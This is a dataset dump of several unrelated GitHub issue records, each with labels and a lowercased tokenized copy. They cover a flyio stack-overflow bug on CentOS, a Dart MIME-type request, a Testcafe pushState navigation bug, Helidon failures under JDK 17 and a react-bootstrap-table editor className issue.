at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
```
任何代码皆可复现,比如:
``` javascript
let res = await fly.get(`{url}`);
```
目前临时解决方式,是把**fly**库再换回**request-promise**,一切又正常了。 | 1.0 | 最新版(0.6.4)在Linux(centos)上运行报错 - 更新到最新版:**0.6.4**
Mac OS(10.14)和Windows 10上运行一切正常,可是部署在阿里云(**CentOS Linux release 7.5.1804**)之后,报如下错误:
```
RangeError: Maximum call stack size exceeded (uncaughtException throw 1 times on pid:30014)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:143:26)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
at Object.clone (/home/xiaohui/temp2/stronger-mp-back/node_modules/_flyio@0.6.4@flyio/dist/npm/fly.js:159:33)
```
任何代码皆可复现,比如:
``` javascript
let res = await fly.get(`{url}`);
```
目前临时解决方式,是把**fly**库再换回**request-promise**,一切又正常了。 | process | 最新版( )在linux(centos)上运行报错 更新到最新版: mac os( )和windows ,可是部署在阿里云( centos linux release )之后,报如下错误: rangeerror maximum call stack size exceeded uncaughtexception throw times on pid at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js at object clone home xiaohui stronger mp back node modules flyio flyio dist npm fly js 任何代码皆可复现,比如: javascript let res await fly get url 目前临时解决方式,是把 fly 库再换回 request promise ,一切又正常了。 | 1 |
13,820 | 16,582,978,484 | IssuesEvent | 2021-05-31 14:19:01 | laugharn/link | https://api.github.com/repos/laugharn/link | closed | Up-to-date User | kind/improvement process/selected size/sm team/back team/front | - [ ] Add a GET handler to /api/v1/user that will return an up to date version of the user
- [ ] Remove any use of the user cookie
- [ ] Cleanup
Down the line we'll probably refactor this to use localStorage | 1.0 | Up-to-date User - - [ ] Add a GET handler to /api/v1/user that will return an up to date version of the user
- [ ] Remove any use of the user cookie
- [ ] Cleanup
Down the line we'll probably refactor this to use localStorage | process | up to date user add a get handler to api user that will return an up to date version of the user remove any use of the user cookie cleanup down the line we ll probably refactor this to use localstorage | 1 |
6,021 | 8,823,193,630 | IssuesEvent | 2019-01-02 12:38:40 | emacs-ess/ESS | https://api.github.com/repos/emacs-ess/ESS | closed | Activate goto-address-mode in inferior buffers? | process |
With interactive applications (shiny in particularly) it's getting more common to show the link in the buffer like
```
Listening on http://127.0.0.1:7087
```
Shall we activate `goto-address-mode`? It registers with jit lock so the performance penalty is close to 0. | 1.0 | Activate goto-address-mode in inferior buffers? -
With interactive applications (shiny in particularly) it's getting more common to show the link in the buffer like
```
Listening on http://127.0.0.1:7087
```
Shall we activate `goto-address-mode`? It registers with jit lock so the performance penalty is close to 0. | process | activate goto address mode in inferior buffers with interactive applications shiny in particularly it s getting more common to show the link in the buffer like listening on shall we activate goto address mode it registers with jit lock so the performance penalty is close to | 1 |
919 | 3,378,314,489 | IssuesEvent | 2015-11-25 10:11:56 | Wikitalia/edgesense | https://api.github.com/repos/Wikitalia/edgesense | closed | Remove loops from graph visualization and edge count | enhancement front-end processing | It is not clear that loops have meaning in a social network of comments. Removing them improves the clarity of the graph. | 1.0 | Remove loops from graph visualization and edge count - It is not clear that loops have meaning in a social network of comments. Removing them improves the clarity of the graph. | process | remove loops from graph visualization and edge count it is not clear that loops have meaning in a social network of comments removing them improves the clarity of the graph | 1 |
15,759 | 2,869,057,449 | IssuesEvent | 2015-06-05 22:59:26 | dart-lang/sdk | https://api.github.com/repos/dart-lang/sdk | closed | mime: please add 'text/x-markdown' for markdown file extensions (md, markdown) to the _defaultExtensionMap | Area-Pkg Pkg-MIME Priority-Unassigned Triaged Type-Defect | *This issue was originally filed by ross.dart....@gmail.com*
_____
0.6.21_r26639
As markdown is quite common these days, and this change does not conflict with anything currently in the \_defaultExtensionMap, I think it is reasonable to add it?
'md':'text/x-markdown',
'markdown':'text/x-markdown',
The mime type 'text/x-markdown' seems to be what is most commonly used, for example:
node-mime: https://github.com/broofa/node-mime/pull/48/files
CodeMirror: http://codemirror.net/mode/markdown/
thanks! | 1.0 | mime: please add 'text/x-markdown' for markdown file extensions (md, markdown) to the _defaultExtensionMap - *This issue was originally filed by ross.dart....@gmail.com*
_____
0.6.21_r26639
As markdown is quite common these days, and this change does not conflict with anything currently in the \_defaultExtensionMap, I think it is reasonable to add it?
'md':'text/x-markdown',
'markdown':'text/x-markdown',
The mime type 'text/x-markdown' seems to be what is most commonly used, for example:
node-mime: https://github.com/broofa/node-mime/pull/48/files
CodeMirror: http://codemirror.net/mode/markdown/
thanks! | non_process | mime please add text x markdown for markdown file extensions md markdown to the defaultextensionmap this issue was originally filed by ross dart gmail com as markdown is quite common these days and this change does not conflict with anything currently in the defaultextensionmap i think it is reasonable to add it md text x markdown markdown text x markdown the mime type text x markdown seems to be what is most commonly used for example node mime codemirror thanks | 0 |
9,078 | 12,149,274,990 | IssuesEvent | 2020-04-24 15:53:12 | nion-software/nionswift | https://api.github.com/repos/nion-software/nionswift | closed | 1D data items (line plots) with negative scale show no data | f - line-plot f - processing level - easy type - bug | To reproduce the issue type the following into the builtin python console:
```python
import numpy as np
di=api.library.create_data_item_from_data(np.arange(100))
```
creates a data item with a line. Everything is fine so far. If you then do:
```python
c=api.create_calibration(scale=-1)
di.set_dimensional_calibrations([c])
```
After this command the data disappears from the data item. You can still do everything as normal, but you just do not see the plot. So the data seems to be there but is just not shown (also the labels at the axis are shown correctly). If you switch the display style to pixels or fractional the data appears. In calibrated mode it disappears again.
The issue occurs in Swift 0.12 and 0.13. It is not there in Swift 0.11 and earlier. | 1.0 | 1D data items (line plots) with negative scale show no data - To reproduce the issue type the following into the builtin python console:
```python
import numpy as np
di=api.library.create_data_item_from_data(np.arange(100))
```
creates a data item with a line. Everything is fine so far. If you then do:
```python
c=api.create_calibration(scale=-1)
di.set_dimensional_calibrations([c])
```
After this command the data disappears from the data item. You can still do everything as normal, but you just do not see the plot. So the data seems to be there but is just not shown (also the labels at the axis are shown correctly). If you switch the display style to pixels or fractional the data appears. In calibrated mode it disappears again.
The issue occurs in Swift 0.12 and 0.13. It is not there in Swift 0.11 and earlier. | process | data items line plots with negative scale show no data to reproduce the issue type the following into the builtin python console python import numpy as np di api library create data item from data np arange creates a data item with a line everything is fine so far if you then do python c api create calibration scale di set dimensional calibrations after this command the data disappears from the data item you can still do everything as normal but you just do not see the plot so the data seems to be there but is just not shown also the labels at the axis are shown correctly if you switch the display style to pixels or fractional the data appears in calibrated mode it disappears again the issue occurs in swift and it is not there in swift and earlier | 1 |
226,320 | 18,011,700,282 | IssuesEvent | 2021-09-16 09:20:40 | oracle/helidon | https://api.github.com/repos/oracle/helidon | closed | helidon-tests-integration-mp-grpc fails with JDK 17 | P3 testing |
## Environment Details
* Helidon Version: 2.3.1-SNAPSHOT
* MP
* JDK version: java 17-ea 2021-09-14 LTS
* OS: Oracle Linux Server release 7.7
----------
## Problem Description
The test `tests/integration/mp-grpc` fails when built with JDK 17.
## Steps to reproduce
1. Set `JAVA_HOME` to JDK 11 and do priming build of helidon repo: `mvn clean install -DskipTests`
2. Set `JAVA_HOME` to JDK 17 and build test:
```
cd tests/integration/mp-grpc
mvn clean install
```
Lots of exceptions from the test. Here are some hilights:
```
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldUseSpecificMethodInterceptorBean Time elapsed: 0.25 s <<< ERROR!
java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int) throws java.lang.ClassFormatError accessible:
module java.base does not "opens java.lang" to unnamed module @164a08fd
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199)
at java.base/java.lang.reflect.Method.setAccessible(Method.java:193)
at org.jboss.weld.util.bytecode.ClassFileUtils$1.run(ClassFileUtils.java:67)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:569)
at org.jboss.weld.util.bytecode.ClassFileUtils.makeClassLoaderMethodsAccessible(ClassFileUtils.java:60)
at org.jboss.weld.bootstrap.WeldStartup.startContainer(WeldStartup.java:220)
. . .
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldDiscoverServiceInterceptor Time elapsed: 0.385 s <<< ERROR!
org.jboss.weld.exceptions.WeldException: WELD-001524: Unable to load proxy class for bean Implicit Bean
[javax.enterprise.inject.Instance] with qualifiers [@Default] with class interface javax.enterprise.inject.Instance
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:507)
. . .
Caused by: java.lang.RuntimeException: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:118)
at org.jboss.weld.bean.proxy.ProxyFactory.createProxyClass(ProxyFactory.java:610)
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:496)
... 62 more
Caused by: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at java.base/jdk.internal.reflect.Reflection.newIllegalAccessException(Reflection.java:392)
at java.base/java.lang.reflect.AccessibleObject.checkAccess(AccessibleObject.java:674)
at java.base/java.lang.reflect.Method.invoke(Method.java:560)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass2(ClassFileUtils.java:143)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:112)
... 64 more
``` | 1.0 | helidon-tests-integration-mp-grpc fails with JDK 17 -
## Environment Details
* Helidon Version: 2.3.1-SNAPSHOT
* MP
* JDK version: java 17-ea 2021-09-14 LTS
* OS: Oracle Linux Server release 7.7
----------
## Problem Description
The test `tests/integration/mp-grpc` fails when built with JDK 17.
## Steps to reproduce
1. Set `JAVA_HOME` to JDK 11 and do priming build of helidon repo: `mvn clean install -DskipTests`
2. Set `JAVA_HOME` to JDK 17 and build test:
```
cd tests/integration/mp-grpc
mvn clean install
```
Lots of exceptions from the test. Here are some hilights:
```
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldUseSpecificMethodInterceptorBean Time elapsed: 0.25 s <<< ERROR!
java.lang.reflect.InaccessibleObjectException: Unable to make protected final java.lang.Class java.lang.ClassLoader.defineClass(java.lang.String,byte[],int,int) throws java.lang.ClassFormatError accessible:
module java.base does not "opens java.lang" to unnamed module @164a08fd
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:354)
at java.base/java.lang.reflect.AccessibleObject.checkCanSetAccessible(AccessibleObject.java:297)
at java.base/java.lang.reflect.Method.checkCanSetAccessible(Method.java:199)
at java.base/java.lang.reflect.Method.setAccessible(Method.java:193)
at org.jboss.weld.util.bytecode.ClassFileUtils$1.run(ClassFileUtils.java:67)
at java.base/java.security.AccessController.doPrivileged(AccessController.java:569)
at org.jboss.weld.util.bytecode.ClassFileUtils.makeClassLoaderMethodsAccessible(ClassFileUtils.java:60)
at org.jboss.weld.bootstrap.WeldStartup.startContainer(WeldStartup.java:220)
. . .
[ERROR] io.helidon.microprofile.grpc.server.InterceptorsTest.shouldDiscoverServiceInterceptor Time elapsed: 0.385 s <<< ERROR!
org.jboss.weld.exceptions.WeldException: WELD-001524: Unable to load proxy class for bean Implicit Bean
[javax.enterprise.inject.Instance] with qualifiers [@Default] with class interface javax.enterprise.inject.Instance
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:507)
. . .
Caused by: java.lang.RuntimeException: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:118)
at org.jboss.weld.bean.proxy.ProxyFactory.createProxyClass(ProxyFactory.java:610)
at org.jboss.weld.bean.proxy.ProxyFactory.getProxyClass(ProxyFactory.java:496)
... 62 more
Caused by: java.lang.IllegalAccessException: class org.jboss.weld.util.bytecode.ClassFileUtils
cannot access a member of class java.lang.ClassLoader (in module java.base) with modifiers "protected final"
at java.base/jdk.internal.reflect.Reflection.newIllegalAccessException(Reflection.java:392)
at java.base/java.lang.reflect.AccessibleObject.checkAccess(AccessibleObject.java:674)
at java.base/java.lang.reflect.Method.invoke(Method.java:560)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass2(ClassFileUtils.java:143)
at org.jboss.weld.util.bytecode.ClassFileUtils.toClass(ClassFileUtils.java:112)
... 64 more
``` | non_process | helidon tests integration mp grpc fails with jdk environment details helidon version snapshot mp jdk version java ea lts os oracle linux server release problem description the test tests integration mp grpc fails when built with jdk steps to reproduce set java home to jdk and do priming build of helidon repo mvn clean install dskiptests set java home to jdk and build test cd tests integration mp grpc mvn clean install lots of exceptions from the test here are some hilights io helidon microprofile grpc server interceptorstest shouldusespecificmethodinterceptorbean time elapsed s error java lang reflect inaccessibleobjectexception unable to make protected final java lang class java lang classloader defineclass java lang string byte int int throws java lang classformaterror accessible module java base does not opens java lang to unnamed module at java base java lang reflect accessibleobject checkcansetaccessible accessibleobject java at java base java lang reflect accessibleobject checkcansetaccessible accessibleobject java at java base java lang reflect method checkcansetaccessible method java at java base java lang reflect method setaccessible method java at org jboss weld util bytecode classfileutils run classfileutils java at java base java security accesscontroller doprivileged accesscontroller java at org jboss weld util bytecode classfileutils makeclassloadermethodsaccessible classfileutils java at org jboss weld bootstrap weldstartup startcontainer weldstartup java io helidon microprofile grpc server interceptorstest shoulddiscoverserviceinterceptor time elapsed s error org jboss weld exceptions weldexception weld unable to load proxy class for bean implicit bean with qualifiers with class interface javax enterprise inject instance at org jboss weld bean proxy proxyfactory getproxyclass proxyfactory java caused by java lang runtimeexception java lang illegalaccessexception class org jboss weld util bytecode classfileutils cannot access a member of class java lang classloader in module java base with modifiers protected final at org jboss weld util bytecode classfileutils toclass classfileutils java at org jboss weld bean proxy proxyfactory createproxyclass proxyfactory java at org jboss weld bean proxy proxyfactory getproxyclass proxyfactory java more caused by java lang illegalaccessexception class org jboss weld util bytecode classfileutils cannot access a member of class java lang classloader in module java base with modifiers protected final at java base jdk internal reflect reflection newillegalaccessexception reflection java at java base java lang reflect accessibleobject checkaccess accessibleobject java at java base java lang reflect method invoke method java at org jboss weld util bytecode classfileutils classfileutils java at org jboss weld util bytecode classfileutils toclass classfileutils java more | 0 |
14,923 | 18,359,528,697 | IssuesEvent | 2021-10-09 01:45:40 | DevExpress/testcafe-hammerhead | https://api.github.com/repos/DevExpress/testcafe-hammerhead | closed | Relative navigation after pushState does not respect new URL | TYPE: bug AREA: client SYSTEM: URL processing FREQUENCY: level 1 STATE: Stale | ### What is your Test Scenario?
I saw some error pages that only happened in TestCafé but not when I execute the text manually. Turns out navigating with `location.href` works differently in TestCafé when you also do `history.pushState` on the page (as e.g. `react-router` does)
### What is the Current behavior?
* Load a website
* Use `history.pushState` with a URL on another level (e.g. use `/` somewhere in the 3rd argument)
* Use `location.href="relative"` to navigate
* The navigations happens relative to the initial URL and not relative to the updated URL
### What is the Expected behavior?
The navigation should happen relative to the URL currently displayed in the address bar, just like it does in the browser.
### What is your web application and your TestCafe test code?
Your website URL: I created a test that runs on some random GitHub pages, see test code below.
<details>
<summary>Your complete test code:</summary>
<!-- Paste your test code here: -->
```js
import {ClientFunction} from 'testcafe';
fixture`testcafe 2140`.page`https://github.com/bxt/testcafe-2140`;
const goAway = ClientFunction(() => {
window.location.href = 'pulls';
});
const virtualNavigation = ClientFunction(() => {
history.pushState({}, "page 2", "testcafe-2140/deeper");
});
const getPageUrl = ClientFunction(() => window.location.href);
test(`navigates to the correct URL on GitHub`, async t => {
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140');
await virtualNavigation();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
await goAway();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
});
```
</details>
<details>
<summary>Your complete test report:</summary>
<!-- Paste your complete result test report here (even if it is huge): -->
```
> testcafe chrome test.ts
Running tests in:
- Chrome 77.0.3865 / Mac OS X 10.14.6
testcafe 2140
✖ has the correct value in Request('/').url on GitHub
1) AssertionError: expected 'https://github.com/bxt/pulls' to deeply equal
'https://github.com/bxt/testcafe-2140/pulls'
Browser: Chrome 77.0.3865 / Mac OS X 10.14.6
19 |
20 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
21 |
22 | await goAway();
23 |
> 24 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
25 |});
26 |
at <anonymous> (/Users/bxt/test.ts:24:32)
at fulfilled (/Users/bxt/test.ts:5:58)
1/1 failed (6s)
```
</details>
### Steps to Reproduce:
Execute the code below "Your complete test code" above in a file e.g. using `testcafe chrome test.ts`.
### Your Environment details:
* testcafe version: 1.5.0
* node.js version: v12.10.0
* command-line arguments: `testcafe chrome test.ts`
* browser name and version: Chrome 77
* platform and version: macOS 10.14.6
* other: none
| 1.0 | Relative navigation after pushState does not respect new URL - ### What is your Test Scenario?
I saw some error pages that only happened in TestCafé but not when I execute the text manually. Turns out navigating with `location.href` works differently in TestCafé when you also do `history.pushState` on the page (as e.g. `react-router` does)
### What is the Current behavior?
* Load a website
* Use `history.pushState` with a URL on another level (e.g. use `/` somewhere in the 3rd argument)
* Use `location.href="relative"` to navigate
* The navigations happens relative to the initial URL and not relative to the updated URL
### What is the Expected behavior?
The navigation should happen relative to the URL currently displayed in the address bar, just like it does in the browser.
### What is your web application and your TestCafe test code?
Your website URL: I created a test that runs on some random GitHub pages, see test code below.
<details>
<summary>Your complete test code:</summary>
<!-- Paste your test code here: -->
```js
import {ClientFunction} from 'testcafe';
fixture`testcafe 2140`.page`https://github.com/bxt/testcafe-2140`;
const goAway = ClientFunction(() => {
window.location.href = 'pulls';
});
const virtualNavigation = ClientFunction(() => {
history.pushState({}, "page 2", "testcafe-2140/deeper");
});
const getPageUrl = ClientFunction(() => window.location.href);
test(`navigates to the correct URL on GitHub`, async t => {
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140');
await virtualNavigation();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
await goAway();
await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
});
```
</details>
<details>
<summary>Your complete test report:</summary>
<!-- Paste your complete result test report here (even if it is huge): -->
```
> testcafe chrome test.ts
Running tests in:
- Chrome 77.0.3865 / Mac OS X 10.14.6
testcafe 2140
✖ has the correct value in Request('/').url on GitHub
1) AssertionError: expected 'https://github.com/bxt/pulls' to deeply equal
'https://github.com/bxt/testcafe-2140/pulls'
Browser: Chrome 77.0.3865 / Mac OS X 10.14.6
19 |
20 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/deeper');
21 |
22 | await goAway();
23 |
> 24 | await t.expect(getPageUrl()).eql('https://github.com/bxt/testcafe-2140/pulls');
25 |});
26 |
at <anonymous> (/Users/bxt/test.ts:24:32)
at fulfilled (/Users/bxt/test.ts:5:58)
1/1 failed (6s)
```
</details>
### Steps to Reproduce:
Execute the code below "Your complete test code" above in a file e.g. using `testcafe chrome test.ts`.
### Your Environment details:
* testcafe version: 1.5.0
* node.js version: v12.10.0
* command-line arguments: `testcafe chrome test.ts`
* browser name and version: Chrome 77
* platform and version: macOS 10.14.6
* other: none
| process | relative navigation after pushstate does not respect new url what is your test scenario i saw some error pages that only happened in testcafé but not when i execute the text manually turns out navigating with location href works differently in testcafé when you also do history pushstate on the page as e g react router does what is the current behavior load a website use history pushstate with a url on another level e g use somewhere in the argument use location href relative to navigate the navigations happens relative to the initial url and not relative to the updated url what is the expected behavior the navigation should happen relative to the url currently displayed in the address bar just like it does in the browser what is your web application and your testcafe test code your website url i created a test that runs on some random github pages see test code below your complete test code js import clientfunction from testcafe fixture testcafe page const goaway clientfunction window location href pulls const virtualnavigation clientfunction history pushstate page testcafe deeper const getpageurl clientfunction window location href test navigates to the correct url on github async t await t expect getpageurl eql await virtualnavigation await t expect getpageurl eql await goaway await t expect getpageurl eql your complete test report testcafe chrome test ts running tests in chrome mac os x testcafe ✖ has the correct value in request url on github assertionerror expected to deeply equal browser chrome mac os x await t expect getpageurl eql await goaway await t expect getpageurl eql at users bxt test ts at fulfilled users bxt test ts failed steps to reproduce execute the code below your complete test code above in a file e g using testcafe chrome test ts your environment details testcafe version node js version command line arguments testcafe chrome test ts browser name and version chrome platform and version macos other none | 1 |
264,671 | 23,131,808,553 | IssuesEvent | 2022-07-28 11:04:18 | kyma-project/kyma | https://api.github.com/repos/kyma-project/kyma | reopened | [Test Case] - Test the integrations with SAP systems | kind/missing-test test-case lifecycle/frozen | **Description**
Implement tests integrating external Java application with Kyma.
We do not have an automated test for testing such integrations and we want to track such scenarios.
**Reasons**
There are some integrations written in Java that are working with Kyma. The main reason is we want to make sure that we do not break any existing integrations. | 2.0 | [Test Case] - Test the integrations with SAP systems - **Description**
Implement tests integrating external Java application with Kyma.
We do not have an automated test for testing such integrations and we want to track such scenarios.
**Reasons**
There are some integrations written in Java that are working with Kyma. The main reason is we want to make sure that we do not break any existing integrations. | non_process | test the integrations with sap systems description implement tests integrating external java application with kyma we do not have an automated test for testing such integrations and we want to track such scenarios reasons there are some integrations written in java that are working with kyma the main reason is we want to make sure that we do not break any existing integrations | 0 |
2,195 | 5,038,422,764 | IssuesEvent | 2016-12-18 08:03:40 | AllenFang/react-bootstrap-table | https://api.github.com/repos/AllenFang/react-bootstrap-table | closed | columnClassName attr is cleared when customEditor is enabled | enhancement inprocess | I noticed that using `customEditor` attribute of `TableHeaderColumn`, when a cell gets into edit mode (`customEditor` is enabled), the `<td>`s `className` defined by `columnClassName` attribute is cleared. Once the cell isn't being edited anymore, the className is restored.
```jsx
<TableHeaderColumn
key={'column-' + h.id}
columnClassName={(h.cellEditor) ? 'editable-td': ''}
customEditor={this.formatEditor(h.id, h.cellEditor)}>
{h.label}
</TableHeaderColumn>
```
Is there any way to keep the `className` in edit mode or pass a `className` to the `<td>` element when cell is in edit mode? | 1.0 | columnClassName attr is cleared when customEditor is enabled - I noticed that using `customEditor` attribute of `TableHeaderColumn`, when a cell gets into edit mode (`customEditor` is enabled), the `<td>`s `className` defined by `columnClassName` attribute is cleared. Once the cell isn't being edited anymore, the className is restored.
```jsx
<TableHeaderColumn
key={'column-' + h.id}
columnClassName={(h.cellEditor) ? 'editable-td': ''}
customEditor={this.formatEditor(h.id, h.cellEditor)}>
{h.label}
</TableHeaderColumn>
```
